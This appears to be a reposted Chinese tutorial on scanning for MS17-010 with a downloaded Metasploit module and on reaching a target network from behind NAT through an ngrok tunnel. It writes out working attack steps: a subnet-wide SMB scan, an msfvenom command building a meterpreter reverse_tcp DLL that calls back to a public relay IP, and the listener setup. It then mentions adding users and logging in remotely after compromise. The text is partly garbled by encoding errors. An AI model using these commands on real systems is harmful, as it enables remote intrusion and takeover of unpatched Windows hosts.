MS17-010漏洞检测与内网穿透技术的应用
0x00 前言
本文主要介紹一下MSF模塊的下載、使用,以及當(dāng)攻擊機(jī)處于內(nèi)網(wǎng),而目標(biāo)機(jī)也處于內(nèi)網(wǎng)的解決方法。這里借助MS17-010漏洞來(lái)具體講解一下,并沒(méi)有新的知識(shí)點(diǎn),可以為剛?cè)腴T(mén)的新手拋磚引玉,提供一條解決問(wèn)題的思路,同時(shí)也記錄一下過(guò)程,加強(qiáng)記憶。
主要分為兩個(gè)知識(shí)點(diǎn),一是SMB漏洞的批量檢測(cè),二是內(nèi)網(wǎng)穿透技術(shù)。
首先是環(huán)境的搭建,具體如下表所示:
| Kali 64位 | 192.168.232.134 | 攻擊機(jī) |
| Windows XP 32位 | 192.168.232.128 | 安裝了python2.6,下載有方程式利用工具包(主要為Windows目錄下的工具) |
| Window2008 R2 64位 | 10.50.2.62 | 靶機(jī),存在MS17-010漏洞,并可以訪問(wèn)外網(wǎng) |
0x01 SMB漏洞批量檢測(cè)
1.掃描腳本的下載和加載
由于Metasploit還沒(méi)有更新MS17-010檢測(cè)的模塊,所以要去exploit-db下載,并在MSF中加載。
| root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb |
啟動(dòng)Metasploit,模塊會(huì)自動(dòng)加載,或者使用命令reload_all重新加載所有模塊。
2.漏洞掃描的使用方法
選擇使用smb_ms_17_010模塊,并查看使用命令。
| msf > use auxiliary/scanner/smb/smb_ms_17_010 msf auxiliary(smb_ms_17_010) > show options |
所必須的參數(shù)有三個(gè),對(duì)于無(wú)需登錄的SMB,我們只需設(shè)置一下掃描的IP段、線程并運(yùn)行即可開(kāi)始掃描。
| msf auxiliary(smb_ms_17_010) > set RHOSTS 10.50.2.1-255 RHOSTS => 10.50.2.1-255 msf auxiliary(smb_ms_17_010) > set THREADS 10 THREADS => 10 msf auxiliary(smb_ms_17_010) > run |
出現(xiàn)黃色警告的表示可能存在,需要進(jìn)一步驗(yàn)證。
為了方便將存在漏洞的IP列出來(lái),寫(xiě)了一個(gè)簡(jiǎn)單的Python腳本。
| import re if __name__ == '__main__': f = open("smb.txt", mode='r', buffering=1) while(True): line = f.readline() if line : if "likely" in line: print line.split(' ')[1].split(':')[0] else: break |
提取出的IP如下所示:
| ..... 10.50.2.52 10.50.2.62 10.50.2.65 10.50.2.61 10.50.2.63 10.50.2.64 10.50.2.76 10.50.2.69 10.50.2.77 10.50.2.78 10.50.2.79 .... |
有了存在漏洞的地址,接下來(lái)將開(kāi)始對(duì)其進(jìn)行驗(yàn)證,以10.50.2.62為例。
由于Kali在虛擬機(jī),宿主機(jī)IP為2.0..,目標(biāo)機(jī)在10.50.2.*。相當(dāng)于需要從內(nèi)網(wǎng)到另一個(gè)內(nèi)網(wǎng), 選擇采用了ngrok進(jìn)行tcp的端口轉(zhuǎn)發(fā)來(lái)實(shí)現(xiàn)內(nèi)網(wǎng)的穿透。
0x02 內(nèi)網(wǎng)穿透
這里采用了www.ngrok.cc平臺(tái)進(jìn)行演示,類似這樣的平臺(tái)有很多,例如natapp.cn等。
注冊(cè)并開(kāi)通隧道,如圖所示。
下載對(duì)應(yīng)的客戶端,下載地址為:https://www.ngrok.cc/#down-client?,選擇與系統(tǒng)對(duì)應(yīng)的軟件。
我這里Kali為64位的,下載和使用命令如下:
| root@kali:~/Downloads# wget hls.ctopus.com/sunny/linux_amd64.zip root@kali:~/Downloads# unzip linux_amd64.zip root@kali:~/Downloads# cd linux_amd64/ root@kali:~/Downloads/linux_amd64# ls root@kali:~/Downloads/linux_amd64# ./sunny clientid 隧道ID |
出現(xiàn)下圖的界面表示運(yùn)行成功。
使用如下命令生成用于監(jiān)聽(tīng)的dll文件。監(jiān)聽(tīng)的IP為server.ngrok.cc的地址,端口為開(kāi)通隧道時(shí)填寫(xiě)的遠(yuǎn)程端口。
| root@kali:~/Documents# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=6266 -f dll > got.dll |
然后在Kali上設(shè)置監(jiān)聽(tīng)本機(jī)的IP和端口,也就是在開(kāi)通隧道時(shí)填寫(xiě)的本地端口。
| use exploit/multi/handler set LHOST 192.168.232.134 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > exploit |
由于關(guān)于Eternalblue利用方法有很多教程了,這里就不詳細(xì)說(shuō)明了,如圖所示。
攻擊成功時(shí)查看ngrok客戶端發(fā)現(xiàn)有一個(gè)連接。
而且Kali上也生成了一個(gè)meterpreter會(huì)話。
之后的操作就很簡(jiǎn)單了,可以添加用戶等等。
最后遠(yuǎn)程登錄成功如下圖所示。
使用natapp也是可以的。
0x03 總結(jié)
本文主要以MS17-010為例,講解了如何下載和利用Metasploit中沒(méi)有的模塊,以及如何解決內(nèi)網(wǎng)到內(nèi)網(wǎng)的穿透的問(wèn)題,當(dāng)然解決的方法還有很多,這里就不再介紹了。
沒(méi)有什么新的知識(shí),怕忘記所以記錄一下~~
0x04 參考
[1]https://www.exploit-db.com/exploits/41891/
[2]http://bobao.360.cn/learning/detail/3041.html
總結(jié)
以上是生活随笔為你收集整理的MS17-010漏洞检测与内网穿透技术的应用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 一篇文章彻底理解自定义View
- 下一篇: AWM在电线中是什么意思?